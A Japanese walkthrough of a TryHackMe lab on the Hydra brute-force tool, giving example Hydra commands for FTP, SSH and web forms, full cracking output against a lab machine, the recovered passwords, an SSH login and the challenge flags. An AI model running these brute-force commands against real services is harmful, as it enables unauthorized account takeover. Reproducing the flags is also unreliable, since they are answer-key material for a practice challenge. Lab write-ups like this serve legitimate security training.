Hydra とは
Hydraは、オンラインのパスワードをゴリゴリ brute force で確認するツール。システムログインとか、ウェブの認証とか、いろんなサービスでパスワードを力技で見つけ出すことが可能。
対応してるサービスはめちゃくちゃ多く、公式情報によると、ざっとこんな感じ。
“Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY,
HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-
Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP,
Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES,
Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum,
SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, TeamSpeak
(TS2), Telnet, VMware-Auth, VNC and XMPP.”
コマンド例
ftp を bruteforce
hydra -l <username> -P passlist.txt ftp://10.10.124.89
ssh を bruteforce
hydra -l <username> -P <full path to pass> 10.10.124.89 -t 4 ssh
フォームを bruteforce
hydra -l <username> -P <wordlist> 10.10.124.89 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
チャレンジ
Use Hydra to bruteforce molly's web password. What is flag 1?
ウェブフォームのページなので、そのまま以下のコマンドでトライ
┌──(kali㉿kali)-[~]
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.124.89
http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
結果はこれ
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-04 19:58:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.124.89:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "654321" - 17 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "michael" - 18 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "ashley" - 19 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "qwerty" - 20 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "111111" - 21 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "iloveu" - 22 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "000000" - 23 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "michelle" - 24 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "tigger" - 25 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "sunshine" - 26 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "chocolate" - 27 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "password1" - 28 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "soccer" - 29 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "anthony" - 30 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "friends" - 31 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "butterfly" - 32 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "purple" - 33 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "angel" - 34 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "jordan" - 35 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "liverpool" - 36 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "justin" - 37 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "loveme" - 38 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "fuckyou" - 39 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "123123" - 40 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "football" - 41 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "secret" - 42 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "andrea" - 43 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "carlos" - 44 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "jennifer" - 45 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "joshua" - 46 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "bubbles" - 47 of 14344399 [child 15] (0/0)
[80][http-post-form] host: 10.10.124.89 login: molly password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-04 19:58:56
sunshine とのこなので login すると
A: THM{2673a7dd116de68e85c48ec0b1f2612e}
Use Hydra to bruteforce molly's SSH password. What is flag 2?
ユーザー名はすでに molly であることがわかっているので、
よく使われている rockyou.txt を利用して bruteforce
今回は試しに ssh_result.txt に出力
──(kali㉿kali)-[~]
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.124.89 -t 4 ssh > ssh_result.txt
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-04 20:08:26
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.124.89:22/
[22][ssh] host: 10.10.124.89 login: molly password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-04 20:08:57
けっかは butterfly
┌──(kali㉿kali)-[~]
└─$ ssh molly@10.10.124.89
molly@10.10.124.89's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
65 packages can be updated.
32 updates are security updates.
Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98
molly@ip-10-10-124-89:~$ ls
flag2.txt
molly@ip-10-10-124-89:~$ cat flag2.txt
THM{c8eeb0468febbadea859baeb33b2541b}
molly@ip-10-10-124-89:~$
A: THM{c8eeb0468febbadea859baeb33b2541b}
終えて
使い方はわりかしシンプルであるにもかかわらず、かなり強力なツールの印象でした。
ただ、bruteforce 対策がされているサイトやシステムだと場合によっては活用は微妙そう